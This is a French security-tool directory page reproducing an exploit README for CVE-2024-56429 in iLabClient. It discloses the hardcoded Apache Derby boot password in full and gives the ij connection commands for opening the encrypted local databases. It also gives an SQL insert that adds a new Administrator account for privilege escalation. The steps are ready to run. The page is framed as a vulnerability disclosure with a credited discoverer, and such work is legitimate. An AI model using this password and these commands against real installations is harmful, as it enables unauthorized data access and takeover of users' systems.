Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56429 — Exploit pour CVE-2024-56429 démontrant l'extraction du mot de passe de démarrage de la base de données Apache Derby à partir du code source d'iLabClient, permettant la connexion locale à la base de données et l'escalade de privilèges via la manipulation d'utilisateurs. | Kitploit
Outils/GitHubGitHub/lisa-2905/cve-2024-56429
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité des Bases de Données
GitHublisa-2905/cve-2024-56429

CVE-2024-56429

Exploit pour CVE-2024-56429 démontrant l'extraction du mot de passe de démarrage de la base de données Apache Derby à partir du code source d'iLabClient, permettant la connexion locale à la base de données et l'escalade de privilèges via la manipulation d'utilisateurs.

Voir le dépôt
6il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-56429

Accès à la base de données locale de iLabClient


Extraire le mot de passe de la base de données

iLabClient utilise une base de données Apache Derby pour stocker les données locales nécessaires. Pour garantir le chiffrement, un bootPassword est utilisé lors de la création, qui peut être extrait du code source (le code extrait se trouve dans DecyptedBootPassword.java). Après exécution du code source extrait, l'utilisateur reçoit le bootPassword.

root@kitploit:~
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==

Connexion à la base de données

Lors du premier démarrage de iLabClient, les deux bases de données locales iLabCLient et iLabDB sont créées. Pour se connecter à ces bases de données, l'outil ij d'Apache Derby peut être utilisé, Téléchargement.

Démarrage de ij :

root@kitploit:~
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij

"C:\ilabClient\java8u422\bin\java.exe" : Version Java installée et utilisée par iLabClient
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" : Bibliothèque Apache Derby

Connexion à la base de données :

root@kitploit:~
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';

Manipulation des données (exemple)

Une fois la connexion établie, les données peuvent être lues et manipulées. Par exemple, en ajoutant un autre utilisateur avec plus de droits.

root@kitploit:~
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');

Le hachage requis peut être créé avec la classe GenerateUserData.java.


Découvreur : Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)

Télécharger l’outil